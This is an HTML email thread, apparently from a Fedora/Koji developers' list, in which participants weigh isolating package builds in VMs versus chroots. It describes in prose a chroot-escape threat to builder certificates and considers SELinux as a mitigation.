<div dir="ltr">On Tue, Sep 3, 2013 at 3:10 PM, Jay Greguske <span dir="ltr"><<a href="mailto:jgregusk@redhat.com" target="_blank">jgregusk@redhat.com</a>></span> wrote:<br><div class="gmail_extra"><div class="gmail_quote">
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">On 09/02/2013 04:29 AM, Miroslav Suchý wrote:<br>
> On 08/30/2013 10:01 PM, Jay Greguske wrote:<br>
>> I'd like to see some elaboration on why VMs instead of chroots would be<br>
>> required. I can draw my own conclusions (security) but I'd like to see<br>
>> them listed out first before continuing the discussion.<br>
><br>
> Koji builder has somewhere stored certificate. This certificate<br>
> authorize him to Koji hub.<br>
> Whoever has this certificate can act as Koji builder.<br>
> Koji builder builds using mock, which means in chroot. There are known<br>
> some exploits, which allows you to run out of chroots.<br>
><br>
> Now imagine evil package, which will run out chroot, read that<br>
> certificate and deliver it to attacker.<br>
> He now can build evil builder and start building modified packages.<br>
><br>
> While there are known exploits to affect host machine of VM, it is<br>
> definitely harder than running out of chroot.<br>
><br>
<br>
If we had SELinux policy enabled on the builders and used MLS on the<br>
chroots that would mitigate chroot-to-chroot attacks. I'm not sure if<br>
policy could prevent a chroot'ed process from getting access to the<br>
builder's certificate. If it could, I think getting SELinux working on<br>
the builders would be an easier path than re-writing koji to use VMs.<br>
<br>
Maybe someone with more expertise could comment on the latter issue.<br>
<span class="HOEnZb"><font color="#888888"><br></font></span></blockquote><div><br></div><div>koji already uses VMs for x86.<br><br>Peter <br></div></div><br></div></div>